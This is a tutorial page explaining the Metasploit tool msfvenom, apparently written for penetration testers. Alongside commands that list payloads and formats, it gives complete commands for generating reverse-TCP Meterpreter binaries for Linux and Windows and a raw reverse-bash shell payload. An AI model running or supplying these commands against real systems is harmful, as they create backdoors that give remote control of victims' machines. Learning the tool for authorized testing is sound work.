How to use the command "msfvenom" (with examples)
msfvenom (with examples)
The msfvenom
command is a powerful tool included in the Metasploit Framework. It allows for the generation of various types of payloads for use with Metasploit, including creating binaries for different operating systems and architectures.
In this article, we will explore five different use cases of msfvenom
with code examples. Each use case will be accompanied by a motivation for using it, an explanation of the arguments used, and an example output.
1: List payloads
msfvenom -l payloads
Motivation: This command provides a comprehensive list of all available payloads that can be used with Metasploit. It is useful in understanding the different options and capabilities of Metasploit.
Explanation: The -l
flag is used to list payloads supported by msfvenom
.
Example output:
Payloads
========
...
linux/x86/custom
php/meterpreter/reverse_tcp
windows/x64/meterpreter_reverse_http
...
2: List formats
msfvenom -l formats
Motivation: This command provides a list of all available output formats for payloads generated by msfvenom
. It helps in determining the appropriate format for the desired use case.
Explanation: The -l
flag is used to list available formats supported by msfvenom
.
Example output:
Formats
=======
asp
aspx
asp_dll
bash
c
csharp
...
3: Show payload options
msfvenom -p payload --list-options
Motivation: This command reveals the various options and parameters that can be configured for a specific payload. It assists in customizing the payload to suit specific requirements.
Explanation: The -p
flag specifies the payload to use, and the --list-options
tells msfvenom
to show available options for that payload.
Example output:
...
LHOST yes The listen address (an interface may be specified)
LPORT 4444 The listen port
...
4: Create an ELF binary with a reverse TCP handler
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f elf -o path/to/binary
Motivation: This command generates an executable file in ELF format for the Linux x64 architecture that establishes a reverse TCP connection to a specified IP address and port. It is useful for creating payloads to exploit Linux systems.
Explanation: The -p
flag specifies the payload to use, which in this case is linux/x64/meterpreter/reverse_tcp
. The LHOST
and LPORT
options are used to specify the listener IP address and port respectively. The -f
flag specifies the output format as ELF. The -o
option is used to define the output path and filename.
Example output: A new ELF binary file is created at the specified path.
5: Create an EXE binary with a reverse TCP handler
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f exe -o path/to/binary.exe
Motivation: This command generates an executable file in EXE format for the Windows x64 architecture that establishes a reverse TCP connection to a specified IP address and port. It can be used for payload creation targeting Windows systems.
Explanation: The -p
flag specifies the payload to use, which in this case is windows/x64/meterpreter/reverse_tcp
. The LHOST
and LPORT
options are used to specify the listener IP address and port respectively. The -f
flag specifies the output format as EXE. The -o
option is used to define the output path and filename.
Example output: A new EXE binary file is created at the specified path.
6: Create a raw bash with a reverse TCP handler
msfvenom -p cmd/unix/reverse_bash LHOST=local_ip LPORT=local_port -f raw
Motivation: This command generates a raw bash payload that establishes a reverse TCP connection to a specified IP address and port. It is useful for creating simple payloads for Unix-based systems.
Explanation: The -p
flag specifies the payload to use, which in this case is cmd/unix/reverse_bash
. The LHOST
and LPORT
options are used to specify the listener IP address and port respectively. The -f
flag specifies the output format as raw.
Example output: The raw payload is displayed in the terminal.
Conclusion
In this article, we explored different use cases of the msfvenom
command. We covered listing payloads and formats, showing payload options, and generating different types of payloads for Linux, Windows, and Unix systems.
msfvenom
provides a powerful and flexible way to create payloads for use with Metasploit. By understanding its capabilities and options, security professionals can effectively leverage this tool to perform penetration testing and develop exploits.